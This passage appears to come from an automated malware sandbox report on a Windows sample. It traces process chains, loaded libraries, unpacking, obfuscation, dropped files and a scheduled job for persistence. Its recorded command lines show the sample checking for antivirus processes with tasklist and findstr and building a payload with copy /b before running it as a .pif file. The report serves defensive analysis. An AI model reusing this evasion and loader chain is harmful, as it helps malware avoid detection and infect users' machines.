Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 331463 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AdditionUnitKoreanLn" Remembered Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Pitch + Twelve + Conditions + Venture + Pushing 331463\Q Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 331463\Pleasure.pif 331463\Q Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe" Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Users\user\AppData\Local\Microsoft\Yuem.exe "C:\Users\user\AppData\Local\Microsoft\Yuem.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe "C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe" Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook Jump to behavior
Source: J2NWKU2oJi.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbTSw source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 20.3.OpenWith.exe.1bd7775aad0.27.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.27.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.2.OpenWith.exe.1bd77939d60.1.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.2.OpenWith.exe.1bd77939d60.1.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.9.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.9.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.13.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.13.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.15.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.15.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.12.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.12.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.7.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.7.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D0D3E9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00D0D3E9
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E3E4E push edi; iretd 16_3_027E3E55
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E5CD2 push dword ptr [edx+ebp+3Bh]; retf 16_3_027E5CDF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E3B74 pushad ; retf 16_3_027E3B83
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E4305 push F693B671h; retf 16_3_027E430A
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E45FC push esi; ret 16_3_027E4600
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E21EF push ecx; iretd 16_3_027E21FB
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E0FCE push eax; retf 16_3_027E0FCF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E4FC8 push es; ret 16_3_027E4FC9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E21AF pushad ; ret 16_3_027E21B7
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6374CA0 push edx; ret 20_3_00007DF4B6374CAB
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6379D1E push esi; retf 000Ah 20_3_00007DF4B6379D1F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFED7C push ecx; ret 22_2_00CFED8F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D1F2BB push ss; iretd 22_2_00D1F2BC
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFF426 push ecx; ret 22_2_00CFF439
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6ED7C push ecx; ret 23_2_00A6ED8F
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A8F2BB push ss; iretd 23_2_00A8F2BC
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6F426 push ecx; ret 23_2_00A6F439
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6F426 push ecx; ret 24_2_00A6F439
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6ED7C push ecx; ret 24_2_00A6ED8F

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe File created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Jump to dropped file
Source: C:\Windows\System32\OpenWith.exe File created: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Jump to dropped file
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe File created: C:\Windows\Tasks\Dctooux.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
